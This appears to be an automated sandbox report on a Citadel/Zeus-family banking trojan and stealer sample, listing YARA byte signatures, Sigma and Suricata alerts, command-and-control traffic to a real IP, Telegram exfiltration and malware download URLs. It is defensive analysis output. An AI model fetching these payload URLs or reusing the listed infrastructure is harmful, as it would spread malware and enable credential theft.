19.3.ApplicationFrameHost.exe.180000.0.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
19.3.ApplicationFrameHost.exe.180000.0.raw.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 18 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 18 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 18 00
19.3.ApplicationFrameHost.exe.180000.0.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
Click to see the 706 entries

Sigma Signatures

System Summary

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe, ProcessId: 1460, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Qicoizh

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, CommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe", ParentImage: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe, ParentProcessId: 1460, ParentProcessName: nyheukpo.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, ProcessId: 3456, ProcessName: svchost.exe

Sigma detected: Modification of IE Registry Settings

Source: Registry Key set

Author: frack113: Data: Details: 0, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe, ProcessId: 5012, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1406

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, CommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe", ParentImage: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe, ParentProcessId: 1460, ParentProcessName: nyheukpo.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, ProcessId: 3456, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE Generic - POST To .php w/Extended ASCII Characters (Likely Zeus Derivative)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-31T11:01:49.319383+0100	2016858	1	A Network Trojan was detected	192.168.2.4	49739	212.224.93.93	443	TCP
2025-01-31T11:01:51.736639+0100	2016858	1	A Network Trojan was detected	192.168.2.4	49741	212.224.93.93	443	TCP
2025-01-31T11:01:52.834672+0100	2016858	1	A Network Trojan was detected	192.168.2.4	49742	212.224.93.93	443	TCP
2025-01-31T11:02:19.944736+0100	2016858	1	A Network Trojan was detected	192.168.2.4	49881	212.224.93.93	443	TCP
2025-01-31T11:02:20.801265+0100	2016858	1	A Network Trojan was detected	192.168.2.4	49886	212.224.93.93	443	TCP
2025-01-31T11:02:23.022353+0100	2016858	1	A Network Trojan was detected	192.168.2.4	49905	212.224.93.93	443	TCP
2025-01-31T11:02:32.192129+0100	2016858	1	A Network Trojan was detected	192.168.2.4	49958	212.224.93.93	443	TCP

ET MALWARE Generic -POST To file.php w/Extended ASCII Characters

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-31T11:01:49.319383+0100	2016172	2	Potentially Bad Traffic	192.168.2.4	49739	212.224.93.93	443	TCP
2025-01-31T11:01:51.736639+0100	2016172	2	Potentially Bad Traffic	192.168.2.4	49741	212.224.93.93	443	TCP

ET MALWARE Generic -POST To gate.php w/Extended ASCII Characters (Likely Zeus Derivative)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-31T11:02:20.801265+0100	2016173	2	Potentially Bad Traffic	192.168.2.4	49886	212.224.93.93	443	TCP
2025-01-31T11:02:32.192129+0100	2016173	2	Potentially Bad Traffic	192.168.2.4	49958	212.224.93.93	443	TCP

ET MALWARE Possible W32/Citadel Download From CnC Server Self Referenced /files/ attachment

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-31T11:01:49.319395+0100	2016742	1	Malware Command and Control Activity Detected	212.224.93.93	443	192.168.2.4	49739	TCP
2025-01-31T11:01:49.409332+0100	2016742	1	Malware Command and Control Activity Detected	212.224.93.93	443	192.168.2.4	49740	TCP
2025-01-31T11:01:51.736651+0100	2016742	1	Malware Command and Control Activity Detected	212.224.93.93	443	192.168.2.4	49741	TCP
2025-01-31T11:01:52.834683+0100	2016742	1	Malware Command and Control Activity Detected	212.224.93.93	443	192.168.2.4	49742	TCP
2025-01-31T11:01:54.296192+0100	2016742	1	Malware Command and Control Activity Detected	212.224.93.93	443	192.168.2.4	49743	TCP

ET MALWARE StormKitty Data Exfil via Telegram

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-31T11:02:35.433109+0100	2031009	1	Malware Command and Control Activity Detected	192.168.2.4	49981	149.154.167.220	443	TCP

ET MALWARE Trojan Generic - POST To gate.php with no referer

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-31T11:02:18.643397+0100	2017930	1	A Network Trojan was detected	192.168.2.4	49873	212.224.93.93	443	TCP
2025-01-31T11:02:19.664939+0100	2017930	1	A Network Trojan was detected	192.168.2.4	49881	212.224.93.93	443	TCP
2025-01-31T11:02:20.524811+0100	2017930	1	A Network Trojan was detected	192.168.2.4	49886	212.224.93.93	443	TCP
2025-01-31T11:02:20.603441+0100	2017930	1	A Network Trojan was detected	192.168.2.4	49890	212.224.93.93	443	TCP
2025-01-31T11:02:21.518830+0100	2017930	1	A Network Trojan was detected	192.168.2.4	49898	212.224.93.93	443	TCP
2025-01-31T11:02:22.779059+0100	2017930	1	A Network Trojan was detected	192.168.2.4	49905	212.224.93.93	443	TCP
2025-01-31T11:02:29.915588+0100	2017930	1	A Network Trojan was detected	192.168.2.4	49946	212.224.93.93	443	TCP
2025-01-31T11:02:31.917477+0100	2017930	1	A Network Trojan was detected	192.168.2.4	49958	212.224.93.93	443	TCP

ET MALWARE UPX compressed file download possible malware

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-31T11:02:31.078684+0100	2001046	3	Misc activity	51.21.41.165	5555	192.168.2.4	49952	TCP

ET MALWARE WorldWind Stealer Checkin via Telegram (GET)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-31T11:02:35.433109+0100	2044766	1	A Network Trojan was detected	192.168.2.4	49981	149.154.167.220	443	TCP

ET MALWARE WorldWind Stealer Sending System information via Telegram (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-31T11:02:39.955560+0100	2044557	1	A Network Trojan was detected	192.168.2.4	50010	149.154.167.220	443	TCP

ET MALWARE Zbot POST Request to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-31T11:01:49.090214+0100	2019141	1	Malware Command and Control Activity Detected	192.168.2.4	49739	212.224.93.93	443	TCP
2025-01-31T11:01:49.090282+0100	2019141	1	Malware Command and Control Activity Detected	192.168.2.4	49740	212.224.93.93	443	TCP
2025-01-31T11:01:50.577838+0100	2019141	1	Malware Command and Control Activity Detected	192.168.2.4	49741	212.224.93.93	443	TCP
2025-01-31T11:01:52.558427+0100	2019141	1	Malware Command and Control Activity Detected	192.168.2.4	49742	212.224.93.93	443	TCP
2025-01-31T11:01:54.024736+0100	2019141	1	Malware Command and Control Activity Detected	192.168.2.4	49743	212.224.93.93	443	TCP
2025-01-31T11:02:18.643397+0100	2019141	1	Malware Command and Control Activity Detected	192.168.2.4	49873	212.224.93.93	443	TCP
2025-01-31T11:02:19.664939+0100	2019141	1	Malware Command and Control Activity Detected	192.168.2.4	49881	212.224.93.93	443	TCP
2025-01-31T11:02:20.524811+0100	2019141	1	Malware Command and Control Activity Detected	192.168.2.4	49886	212.224.93.93	443	TCP
2025-01-31T11:02:20.603441+0100	2019141	1	Malware Command and Control Activity Detected	192.168.2.4	49890	212.224.93.93	443	TCP
2025-01-31T11:02:21.518830+0100	2019141	1	Malware Command and Control Activity Detected	192.168.2.4	49898	212.224.93.93	443	TCP
2025-01-31T11:02:22.779059+0100	2019141	1	Malware Command and Control Activity Detected	192.168.2.4	49905	212.224.93.93	443	TCP
2025-01-31T11:02:29.915588+0100	2019141	1	Malware Command and Control Activity Detected	192.168.2.4	49946	212.224.93.93	443	TCP
2025-01-31T11:02:31.917477+0100	2019141	1	Malware Command and Control Activity Detected	192.168.2.4	49958	212.224.93.93	443	TCP

ET MALWARE Zeus POST Request to CnC - URL agnostic

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-31T11:01:49.090214+0100	2013976	1	Malware Command and Control Activity Detected	192.168.2.4	49739	212.224.93.93	443	TCP
2025-01-31T11:01:49.090282+0100	2013976	1	Malware Command and Control Activity Detected	192.168.2.4	49740	212.224.93.93	443	TCP
2025-01-31T11:01:50.577838+0100	2013976	1	Malware Command and Control Activity Detected	192.168.2.4	49741	212.224.93.93	443	TCP
2025-01-31T11:01:52.558427+0100	2013976	1	Malware Command and Control Activity Detected	192.168.2.4	49742	212.224.93.93	443	TCP
2025-01-31T11:01:54.024736+0100	2013976	1	Malware Command and Control Activity Detected	192.168.2.4	49743	212.224.93.93	443	TCP
2025-01-31T11:02:18.643397+0100	2013976	1	Malware Command and Control Activity Detected	192.168.2.4	49873	212.224.93.93	443	TCP
2025-01-31T11:02:19.664939+0100	2013976	1	Malware Command and Control Activity Detected	192.168.2.4	49881	212.224.93.93	443	TCP
2025-01-31T11:02:20.524811+0100	2013976	1	Malware Command and Control Activity Detected	192.168.2.4	49886	212.224.93.93	443	TCP
2025-01-31T11:02:20.603441+0100	2013976	1	Malware Command and Control Activity Detected	192.168.2.4	49890	212.224.93.93	443	TCP
2025-01-31T11:02:21.518830+0100	2013976	1	Malware Command and Control Activity Detected	192.168.2.4	49898	212.224.93.93	443	TCP
2025-01-31T11:02:22.779059+0100	2013976	1	Malware Command and Control Activity Detected	192.168.2.4	49905	212.224.93.93	443	TCP
2025-01-31T11:02:29.915588+0100	2013976	1	Malware Command and Control Activity Detected	192.168.2.4	49946	212.224.93.93	443	TCP
2025-01-31T11:02:31.917477+0100	2013976	1	Malware Command and Control Activity Detected	192.168.2.4	49958	212.224.93.93	443	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-31T11:02:36.532895+0100	2803305	3	Unknown Traffic	192.168.2.4	49987	149.154.167.220	443	TCP

Joe Security ANOMALY Telegram Send File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-31T11:02:37.556879+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	49997	149.154.167.220	443	TCP
2025-01-31T11:02:39.919801+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	50010	149.154.167.220	443	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-31T11:02:35.433109+0100	1810007	1	Potentially Bad Traffic	192.168.2.4	49981	149.154.167.220	443	TCP
2025-01-31T11:02:36.532895+0100	1810007	1	Potentially Bad Traffic	192.168.2.4	49987	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: services.png.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://51.21.41.165:5555/smbhost.exeo	Avira URL Cloud: Label: malware
Source: http://51.21.41.165:5555/UIServices.exe	Avira URL Cloud: Label: malware
Source: http://51.21.41.165:5555/smbhost.exep	Avira URL Cloud: Label: malware
Source: http://51.21.41.165:5555/smbhost.exey	Avira URL Cloud: Label: malware
Source: http://51.21.41.165:5555/smbhost.exeer	Avira URL Cloud: Label: malware
Source: http://51.21.41.165:5555/UIServices.exed	Avira URL Cloud: Label: malware
Source: http://51.21.41.165:5555/smbhost.exe	Avira URL Cloud: Label: malware
Source: http://51.21.41.165:5555/smbhost.exe-	Avira URL Cloud: Label: malware
Source: http://51.21.41.165:5555/UIServices.exex	Avira URL Cloud: Label: malware
Source: http://51.21.41.165:5555/SearchUI.exe	Avira URL Cloud: Label: malware
Source: http://51.21.41.165:5555/UIServices.exeMicrosoft	Avira URL Cloud: Label: malware
Source: http://51.21.41.165:5555/UIServices.exep	Avira URL Cloud: Label: malware
Source: http://51.21.41.165:5555/smbhost.exe:5555/smbhost.exe	Avira URL Cloud: Label: malware
Source: http://51.21.41.165:5555/smbhost.exeerO	Avira URL Cloud: Label: malware
Source: http://51.21.41.165:5555/SearchUI.exe)	Avira URL Cloud: Label: malware
Source: http://51.21.41.165:5555/UIServices.exe5	Avira URL Cloud: Label: malware
Source: http://51.21.41.165:5555/smbhost.exeF	Avira URL Cloud: Label: malware
Source: http://51.21.41.165:5555/UIServices.exe)	Avira URL Cloud: Label: malware
Source: http://51.21.41.165:5555/UIServices.exe:	Avira URL Cloud: Label: malware
Source: http://51.21.41.165:5555/SearchUI.exeK	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\UIServices[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1307527
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\Users\user\AppData\Local\Temp\tmp49712801\UIServices.exe	Avira: detection malicious, Label: HEUR/AGEN.1307527

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\SearchUI[1].exe	ReversingLabs: Detection: 13%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\UIServices[1].exe	ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\smbhost[1].exe	ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Temp\tmp49712801\UIServices.exe	ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\tmp7e3ae9cd\smbhost.exe	ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Temp\tmpa49210ef\SearchUI.exe	ReversingLabs: Detection: 13%

Multi AV Scanner detection for submitted file

Source: services.png.exe	Virustotal: Detection: 84%			Perma Link
Source: services.png.exe	ReversingLabs: Detection: 89%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\tmpa49210ef\SearchUI.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\UIServices[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\SearchUI[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\tmp49712801\UIServices.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: services.png.exe

Joe Sandbox ML: detected

Location Tracking

Yara detected Hancitor

Source: Yara match

File source: Process Memory Space: nyheukpo.exe PID: 1460, type: MEMORYSTR

Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_00432B37 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	0_2_00432B37
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_00432BCB CreateFileW,CryptAcquireContextW,CryptCreateHash,ReadFile,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,	0_2_00432BCB
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_00421581 CryptUnprotectData,LocalFree,	0_2_00421581
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_02842B37 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	0_2_02842B37
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_02842BCB CreateFileW,CryptAcquireContextW,CryptCreateHash,ReadFile,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,	0_2_02842BCB
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_02831581 CryptUnprotectData,LocalFree,	0_2_02831581
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Code function: 1_2_00432B37 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	1_2_00432B37
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Code function: 1_2_00432BCB CreateFileW,CryptAcquireContextW,CryptCreateHash,ReadFile,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,	1_2_00432BCB
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Code function: 1_2_00421581 CryptUnprotectData,LocalFree,	1_2_00421581

Source: services.png.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 212.224.93.93:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 212.224.93.93:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.16.196:443 -> 192.168.2.4:49879 version: TLS 1.2

Source:	Binary string: wkernel32.pdb source: services.png.exe, 00000000.00000003.1694689173.00000000004D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nel32.pdb source: nyheukpo.exe, 00000001.00000003.2205551996.00000000006BD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: .onel32.pdbUGP source: nyheukpo.exe, 00000001.00000003.2205551996.00000000006BD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wkernel32.pdbUGP source: services.png.exe, 00000000.00000003.1694689173.00000000004D7000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_00415FF1 GetFileAttributesExW,LoadLibraryW,GetProcAddress,SHGetFolderPathW,StrCmpNIW,FreeLibrary,NetUserEnum,NetUserGetInfo,NetApiBufferFree,NetApiBufferFree,SHGetFolderPathW,	0_2_00415FF1
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_02825FF1 GetFileAttributesExW,LoadLibraryW,GetProcAddress,SHGetFolderPathW,StrCmpNIW,FreeLibrary,NetUserEnum,NetUserGetInfo,NetApiBufferFree,NetApiBufferFree,SHGetFolderPathW,	0_2_02825FF1
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Code function: 1_2_00415FF1 GetFileAttributesExW,LoadLibraryW,GetProcAddress,SHGetFolderPathW,StrCmpNIW,FreeLibrary,NetUserEnum,NetUserGetInfo,NetApiBufferFree,NetApiBufferFree,SHGetFolderPathW,	1_2_00415FF1

Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_00414ADD FindFirstFileW,FindFirstFileW,FileTimeToSystemTime,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,Sleep,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,Sleep,FindNextFileW,FindClose,	0_2_00414ADD
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_004394BB PathRemoveFileSpecW,FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,	0_2_004394BB
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_00439576 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,	0_2_00439576
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_02849576 SHGetFolderPathW,FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,	0_2_02849576
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_02824ADD FindFirstFileW,FindFirstFileW,FileTimeToSystemTime,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,Sleep,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,Sleep,FindNextFileW,FindClose,	0_2_02824ADD
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_028494BB PathRemoveFileSpecW,FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,	0_2_028494BB
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Code function: 1_2_00414ADD WaitForSingleObject,FindFirstFileW,FindFirstFileW,FileTimeToSystemTime,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,Sleep,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,Sleep,FindNextFileW,FindClose,	1_2_00414ADD
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Code function: 1_2_00414A30 FindFirstFileW,	1_2_00414A30
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Code function: 1_2_004394BB PathRemoveFileSpecW,FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,	1_2_004394BB
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Code function: 1_2_00439576 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,	1_2_00439576
Source: C:\Windows\System32\sihost.exe	Code function: 2_2_000001CD438BDCE0 FindFirstFileExW,	2_2_000001CD438BDCE0
Source: C:\Windows\System32\svchost.exe	Code function: 3_2_00000151A656DCE0 FindFirstFileExW,	3_2_00000151A656DCE0
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_0000019E29CFDCE0 FindFirstFileExW,	4_2_0000019E29CFDCE0
Source: C:\Windows\System32\ctfmon.exe	Code function: 5_2_000001F28B4EDCE0 FindFirstFileExW,	5_2_000001F28B4EDCE0
Source: C:\Windows\System32\ctfmon.exe	Code function: 5_2_000001F28B54DCE0 FindFirstFileExW,	5_2_000001F28B54DCE0
Source: C:\Windows\explorer.exe	Code function: 6_2_0907DCE0 FindFirstFileExW,	6_2_0907DCE0
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00000221D596DCE0 FindFirstFileExW,	7_2_00000221D596DCE0
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 9_2_000001ECFC69DCE0 FindFirstFileExW,	9_2_000001ECFC69DCE0
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 14_2_000001D17874DCE0 FindFirstFileExW,	14_2_000001D17874DCE0
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 14_2_000001D1787ADCE0 FindFirstFileExW,	14_2_000001D1787ADCE0
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 17_2_0000023B6120DCE0 FindFirstFileExW,	17_2_0000023B6120DCE0
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 17_2_0000023B6126DCE0 FindFirstFileExW,	17_2_0000023B6126DCE0
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 18_2_000002135E7EDCE0 FindFirstFileExW,	18_2_000002135E7EDCE0
Source: C:\Windows\System32\ApplicationFrameHost.exe	Code function: 19_2_000001F6E818DCE0 FindFirstFileExW,	19_2_000001F6E818DCE0

Source: C:\Users\user\Desktop\services.png.exe

Code function: 0_2_00433EDE GetModuleHandleW,GetProcAddress,NtQueryInformationProcess,GetLogicalDriveStringsW,QueryDosDeviceW,lstrlenW,lstrlenW,lstrcpynW,lstrcpynW,lstrcpynW,

0_2_00433EDE

Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	File opened: C:\Users\user\AppData\Local\Adobe\
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2013976 - Severity 1 - ET MALWARE Zeus POST Request to CnC - URL agnostic : 192.168.2.4:49740 -> 212.224.93.93:443
Source: Network traffic	Suricata IDS: 2013976 - Severity 1 - ET MALWARE Zeus POST Request to CnC - URL agnostic : 192.168.2.4:49739 -> 212.224.93.93:443
Source: Network traffic	Suricata IDS: 2019141 - Severity 1 - ET MALWARE Zbot POST Request to C2 : 192.168.2.4:49740 -> 212.224.93.93:443
Source: Network traffic	Suricata IDS: 2019141 - Severity 1 - ET MALWARE Zbot POST Request to C2 : 192.168.2.4:49739 -> 212.224.93.93:443
Source: Network traffic	Suricata IDS: 2013976 - Severity 1 - ET MALWARE Zeus POST Request to CnC - URL agnostic : 192.168.2.4:49741 -> 212.224.93.93:443
Source: Network traffic	Suricata IDS: 2019141 - Severity 1 - ET MALWARE Zbot POST Request to C2 : 192.168.2.4:49741 -> 212.224.93.93:443
Source: Network traffic	Suricata IDS: 2016858 - Severity 1 - ET MALWARE Generic - POST To .php w/Extended ASCII Characters (Likely Zeus Derivative) : 192.168.2.4:49739 -> 212.224.93.93:443
